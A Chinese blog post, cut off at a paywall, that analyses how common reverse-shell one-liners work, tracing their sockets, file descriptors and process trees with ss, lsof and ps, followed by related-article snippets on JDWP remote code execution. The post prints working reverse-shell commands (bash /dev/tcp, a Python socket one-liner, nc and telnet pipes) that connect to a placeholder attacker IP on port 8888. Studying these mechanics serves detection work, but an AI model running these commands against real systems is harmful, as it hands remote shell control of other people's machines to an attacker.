java jdwp_利用 JAVA 调试协议 JDWP 实现反弹 shell

最新推荐文章于 2024-05-17 09:48:52 发布
最新推荐文章于 2024-05-17 09:48:52 发布
阅读量773 收藏 1
点赞数 1
文章标签: java jdwp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35971708/article/details/114133875
版权

说明

前面已经有两篇文章介绍了有关反弹shell的内容,使用Java反弹shell和绕过exec获取反弹shell。之前的文章主要聚焦如何使用java来反弹shell。网上的各种文章也是将各种反弹shell的一句话的写法。但是鲜有文章分析不同反弹shell的方式之间的差异性,以及反弹shell之间的进程关联。

初识

BASH

还是以最为简单的反弹shell为例来说明情况:

bash -i >& /dev/tcp/ip/port 0>&1

在本例中,我使用8888端口反弹shell

我们使用ss和lsof查询信息:

ss -anptw | grep 8888

tcp ESTAB 0 0 172.16.1.2:56862 ip:8888 users:(("bash",pid=13662,fd=2),("bash",pid=13662,fd=1),("bash",pid=13662,fd=0))

lsof -i:8888

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME

bash 13662 username 0u IPv4 518699 0t0 TCP dev:56862->ip:8888 (ESTABLISHED)

bash 13662 username 1u IPv4 518699 0t0 TCP dev:56862->ip:8888 (ESTABLISHED)

bash 13662 username 2u IPv4 518699 0t0 TCP dev:56862->ip:8888 (ESTABLISHED)

通过分析,确实与ip:8888建立了网络链接,并且文件描述符0/1/2均建立了网络链接。分析下其中的进程关系

ps -ef | grep 13662

username 13662 13645 0 16:56 pts/7 00:00:00 bash -i

username 13645 13332 0 16:55 pts/7 00:00:00 /bin/bash

username 13662 13645 0 16:56 pts/7 00:00:00 bash -i

当前网络链接的进程的PID是13662,进程是bash -i。而父进程是13645,是/bin/bash进程。

Python

以Python为例继续分析:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用Python反弹shell的原理和上面bash -i >& /dev/tcp/ip/port 0>&1相同,只不过外面使用了Python封装了一下。查看信息:

ss -anptw | grep 8888

tcp ESTAB 0 0 172.16.1.2:59690 IP:8888 users:(("sh",pid=19802,fd=3),("sh",pid=19802,fd=2),("sh",pid=19802,fd=1),("sh",pid=19802,fd=0),("python",pid=19801,fd=3),("python",pid=19801,fd=2),("python",pid=19801,fd=1),("python",pid=19801,fd=0))

lsof -i:8888

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME

python 19801 username 0u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

python 19801 username 1u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

python 19801 username 2u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

python 19801 username 3u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

sh 19802 username 0u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

sh 19802 username 1u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

sh 19802 username 2u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

sh 19802 username 3u IPv4 593062 0t0 TCP usernamedev:59690->IP:8888 (ESTABLISHED)

真正进行网络通信的是进程是PID为19802的Sh进程,其父进程是19801进程。如下:

ps -ef | grep 19802

username 19802 19801 0 19:46 pts/7 00:00:00 /bin/sh -i

ps -ef | grep 19801

username 19801 19638 0 19:46 pts/7 00:00:00 python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

username 19802 19801 0 19:46 pts/7 00:00:00 /bin/sh -i

所以使用Python反弹shell的原理其实就是使用Python开启了/bin/sh -i,利用/bin/sh -i完成反弹shell。

Telnet

telnet IP 8888 | /bin/bash | telnet IP 9999

当然上面的写法还可以换成nc IP 8888 | /bin/bash | nc IP 9999,本质上都是一样的。以nc IP 8888 | /bin/bash | nc IP 9999为例来进行说明:

这种方式需要在远程服务器上面监听8888和9999端口。分析其中的进程关系:

ss -anptw | grep 8888

tcp ESTAB 0 0 172.16.1.2:33562 IP:8888 users:(("nc",pid=21613,fd=3))

ss -anptw | grep 9999

tcp ESTAB 0 0 172.16.1.2:35876 IP:9999 users:(("nc",pid=21615,fd=3))

ps -ef | grep 15166

username 15166 7593 0 17:32 pts/10 00:00:00 zsh

username 21613 15166 0 20:18 pts/10 00:00:00 nc IP 8888

username 21614 15166 0 20:18 pts/10 00:00:00 /bin/bash

username 21615 15166 0 20:18 pts/10 00:00:00 nc IP 9999

可以看到/bin/bash和两个nc的父进程是相同的,都是zsh进程。

那么 这三个进程之间是如何进行通信的呢?我们来分别看三者之间的fd。

21614

ls -al /proc/21614/fd

dr-x------ 2 username username 0 Apr 10 20:19 .

dr-xr-xr-x 9 username username 0 Apr 10 20:19 ..

lr-x------ 1 username username 64 Apr 10 20:19 0 -> 'pipe:[618298]'

l-wx------ 1 username username 64 Apr 10 20:19 1 -> 'pipe:[618300]'

lrwx------ 1 username username 64 Apr 10 20:19 2 -> /dev/pts/10

21613

ls -al /proc/21613/fd

dr-x------ 2 username username 0 Apr 10 20:19 .

dr-xr-xr-x 9 username username 0 Apr 10 20:19 ..

lrwx------ 1 username username 64 Apr 10 20:19 0 -> /dev/pts/10

l-wx------ 1 username username 64 Apr 10 20:19 1 -> 'pipe:[618298]'

lrwx------ 1 username username 64 Apr 10 20:19 2 -> /dev/pts/10

lrwx------ 1 username username 64 Apr 10 20:19 3 -> 'socket:[617199]'

21615

ls -al /proc/21615/fd

dr-x------ 2 username username 0 Apr 10 20:19 .

dr-xr-xr-x 9 username username 0 Apr 10 20:19 ..

lr-x------ 1 username username 64 Apr 10 20:19 0 -> 'pipe:[618300]'

lrwx------ 1 username username 64 Apr 10 20:19 1 -> /dev/pts/10

lrwx------ 1 username username 64 Apr 10 20:19 2 -> /dev/pts/10

lrwx------ 1 username username 64 Apr 10 20:19 3 -> 'socket:[619628]'

那么这三者之间的关系如下图所示:

66da9d73d24211514e27bbcdcce8c91e.png

这样在IP:8888中输出命令就能够在IP:9999中看到输出。

mkfifo

在介绍mkfifo之前,需要了解一些有关Linux中与管道相关的知识。管道是一种最基本的IPC机制,主要是用于进程间的通信,完成数据传递。管道常见的就是平时看到的pipe。pipe是一种匿名管道,匿名管道只能用于有亲系关系的进程间通信,即只能在父进程与子进程或兄弟进程间通信。而通过mkfifo创建的管道是有名管道,有名管道就是用于没有情缘关系之间的进程通信。

而通信方式又分为:单工通信、半双工通信、全双工通信。

单工通信:单工数据传输只支持数据在一个方向上传输,就和传呼机一样。例如信息只能由一方A传到另一方B,一旦确定传-输方和接受方之后,就不能改变了,只能是一方接受数据,另一方发发送数据。

半双工通信:数据传输指数据可以在一个信号载体的两个方向上传输,但是不能同时传输。在半双工模式下,双方都可以作为数据的发送放和接受方,但是在同一个时刻只能是一方向另一方发送数据。

全双工通信:通信双方都能在同一时刻进行发送和接收数据。这种模式就像电话一样,双方在听对方说话的同时自己也可以说话。

通过mkfifo创建的有名管道就是一个半双工的管道。例如:

mkfifo /tmp/f

ls -al /tmp/f

prw-r--r-- 1 username username 0 Apr 14 15:30 /tmp/f

通过

最低0.47元/天 解锁文章
emi0wb
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深入Java调试体系,第3部分:JDWP协议实现
02-03
JDWP协议介绍协议分析Packet的结构JDWP传输接口(JavaDebugWireProtocolTransportInterface)JDWP的命令实现机制JDWP的事件处理机制结语参考资料JPDA(JavaPlatformDebuggerArchitecture)是Java平台调试体系结构的...
java - jdwp远程调试线协议的使用
小草飞上天
06-13 1715
JDWPJava Debug Wire Protocol)调试线协议,及通过客户端与远程java服务程序之间的传输协议
深入 Java 调试体系,第 3 部分
有家客栈 君子不器
09-15 900
<br />(源自:http://www.ibm.com/developerworks/cn/java/j-lo-jpda3/)深入 Java 调试体系,第 3 部分: JDWP 协议实现文档选项<br />打印本页<br />将此页作为电子邮件发送<br /><br />级别: 中级<br />虞 俊杰, 软件工程师 , IBM<br />徐 睿智, 软件工程师 , IBM<br />2009 年 9 月 03 日JPDA(Java Platform Debugger Architecture) 是 J
探索JDWP漏洞利用JDWP-shellifier脚本
最新发布
gitblog_00020的博客
05-17 443
探索JDWP漏洞利用JDWP-shellifier脚本 项目地址:https://gitcode.com/IOActive/jdwp-shellifier 项目简介 JDWP-shellifier 是一个由安全研究人员开发的渗透测试工具,旨在针对运行中的JDWPJava Debug Wire Protocol)服务进行远程代码执行攻击。这个开源项目提供了一种简便的方法,让安全专业人员能够评估和...
java JDWP调试接口任意命令执行漏洞
tangshuangsss的专栏
12-16 5562
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介JDWPJava DEbugger Wire Protocol):即Java调试线协议,是一个为Java...
JPDA框架和JDWP协议
liudong200618的博客
01-26 927
在逆向开发中,一般都需要对目标App进行代码注入。主流的代码注入工具是,这个工具能稳定高效实现java代码hook和native代码hook,不过缺点是需要使用Root设备,而且用js开发,入门门槛较高。最近发现一种非Root环境下对Debug App进行代码注入的方案,原理是利用Java调试框架,通过调试器与目标虚拟机之间通讯,实现对虚拟机进程的修改。
Java Debugger JDWP Agent Library
tterminator的专栏
08-02 1501
一、调出帮助信息在终端下执行如下命令: java -agentlib:jdwp=help二、具体帮助信息 Java Debugger JDWP Agent Library -------------------------------- (see http://java.sun.com/products/jpda for more inf
深入Java调试体系(JPDA-JDWP)
03-13
JPDA 主要由三个部分组成:Java 虚拟机工具接口(JVMTI),Java 调试线协议JDWP),以及 Java 调试接口(JDI),本系列将会详细介绍这三个模块的内部细节、通过实例为读者揭开 JPDA 的面纱。
jdwp:Java调试线协议
05-15
jdwp Java调试线协议安装$ npm i jdwp --save用法启动Java项目并连接到jvm const { launcher } = require ( 'jdwp' )const vm = await launcher . launch ( { mainClass : 'Test' , vmArgs : [ '-Dfile.encoding=UTF...
深入Java调试体系,第2部分:JVMTI和Agent实现
03-02
JPDA主要由三个部分组成:Java虚拟机工具接口(JVMTI)、Java调试线协议JDWP),以及Java调试接口(JDI)。本系列将会详细介绍这三个模块的内部细节,并通过实例为读者揭开JPDA的面纱。本系列的第1部分从整体上...
【漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 6081
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。 JDI(Java Debug Interface):Java库接口,实现JDWP协议的客户端,调试器可以用来和远程被调试应用通信。 JDWPJava
JDWP
weixin_34268169的博客
01-30 126
    JPDA(Java Platform Debugger Architecture) 是 Java 平台调试体系结构的缩写,通过 JPDA 提供的 API,开发人员可以方便灵活的搭建 Java 调试应用程序。JPDA 主要由三个部分组成:Java 虚拟机工具接口(JVMTI),Java 调试线协议JDWP),以及 Java 调试接口(JDI)。 JDWPJava Debug W...
JDWP未授权快速利用
爱测未来团队博客
09-04 2423
JDWP简介 这里首先要说明一下 debugger 和 target vm。Target vm 中运行着我们希望要调试的程序,它与一般运行的 Java 虚拟机没有什么区别,只是在启动时加载了 Agent JDWP 从而具备了调试功能。而 debugger 就是我们熟知的调试器,它向运行中的 target vm 发送命令来获取 target vm 运行时的状态和控制 Java 程序的执行。Debu...
jdwp命令执行
公众号shadow sock7
10-18 8415
利用脚本: https://github.com/IOActive/jdwp-shellifier 命令成功执行 用wireshark抓包发现
JVM远程调试搭建心得体会
阿拉斯加大闸蟹的博客
03-04 856
远程调试 为什么需要进行远程调试: 一些程序本地测试没有问题,但是一到线上或者测试环境中就会出现各种bug,但是线上环境又没有IDE,没有办法在线上进行调试,这个时候就需要远程调试来对线上问题进行排查。 1.远程调试流程 1.1 Idea远程调试 [Run]->[Edit Configurations]->[+]->[Remote] 起一个应用的名称,一般...
Java 调试技术 JPDA 架构解读
java_dazhuzhu的博客
08-10 1523
JPDA 概览 JPDA 的全称是 Java Platform Debugger Architecture,它是 Java 官方针对 Java 代码调试所设计的一个机制。在 Oracle 官网上有专门的页面介绍。它属于多层架构,包括:JVMTI 接口规范、JDWP 通信规范、JDI API 层。 Debug 应该是每个程序员都经历过的,日常基于 IDE 的开发中,我们可以给某行代码打上断点,然后以 Debug 模式运行程序,程序运行后会在断点处暂停,这时开发者可以安逸地查看此时各个变量的值,也可以在
如何编写自己的Java / Scala调试
最佳 Java 编程
05-16 243
通过这篇文章,我们将探讨Java / Scala调试器的编写和工作方式。 诸如Windows的WinDbg或Linux / Unix的gdb之类的本机调试器通过操作系统直接提供给它们的钩子来获取其强大功能,以监视和操纵外部进程的状态。 JVM充当OS之上的抽象层,它提供了自己的独立体系结构来调试字节码。 该框架及其API是完全开放的,有文档的和可扩展的,这意味着您可以轻松编写自己的调试...
Java安全』初试JDWP攻击
Ho1aAs‘s Blog
08-30 1248
Java Debug Wire Protocol(JDWP)是一种通信协议,是Java Platform Debugger Architecture的一部分。它用于调试器和Java虚拟机之间的通信,Java虚拟机进行调试。它允许在其他计算机上调试进程,可以通过网络套接字或共享内存工作。平常使用IDEA debug就是把上面的过程简化。...
JDWP通信解析格式
liudong200618的博客
01-26 380
本质上我们通过IDEA或者eclipse通过断点的方式调试JAVA应用时,使用的就是JDWP.之前写过的Nuxeo RCE漏洞分析中的 第一步Docker远程调试用的是JDWP.而JDWP的漏洞的危害就如同之前写过的文章xdebug的攻击面。因为是调试协议,不可能带有认证信息,那么对于一个开启了调试端口的JAVA应用,我们就可能利用JDWP进行调试,最终执行命令。比如你在线上跑了一个应用,但是这个问题只有在线上才会出现问题,那么这个时候就必须开启远程调试功能了,此时就有可能被攻击者利用RCE。
gdb 调试java进程_GDB多进程调试
06-01
GDB是一个用于调试程序的强大工具,不仅可以调试C/C++程序,还可以调试Java程序。下面简单介绍一下如何使用GDB调试Java进程。 首先需要在Java程序中启用调试功能,可以在启动Java程序时添加如下参数: ```bash java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n YourJavaClass ``` 其中,`-Xdebug`表示启用调试功能,`-Xrunjdwp`表示使用JDWP协议进行调试,`transport=dt_socket`表示使用socket作为传输方式,`address=8000`表示监听8000端口,`server=y`表示程序作为调试服务端,`suspend=n`表示不在启动时暂停程序。 接下来,使用GDB连接Java进程: ```bash gdb -pid <pid> ``` 其中,`<pid>`是Java程序的进程ID。连接成功后,可以使用GDB的命令进行调试,如下: ```bash # 设置断点 break YourJavaClass:lineNumber # 运行程序 run # 单步调试 step # 查看变量值 print variableName # 继续执行 continue ``` 另外,如果Java程序发生异常,可以使用GDB打印出异常信息: ```bash catch throw run info catch ``` 以上就是使用GDB调试Java程序的简单介绍。需要注意的是,在使用GDB调试Java进程时,可能会遇到多进程调试的情况。针对这种情况,可以使用GDB的`set follow-fork-mode`命令来解决。具体可以参考GDB的官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值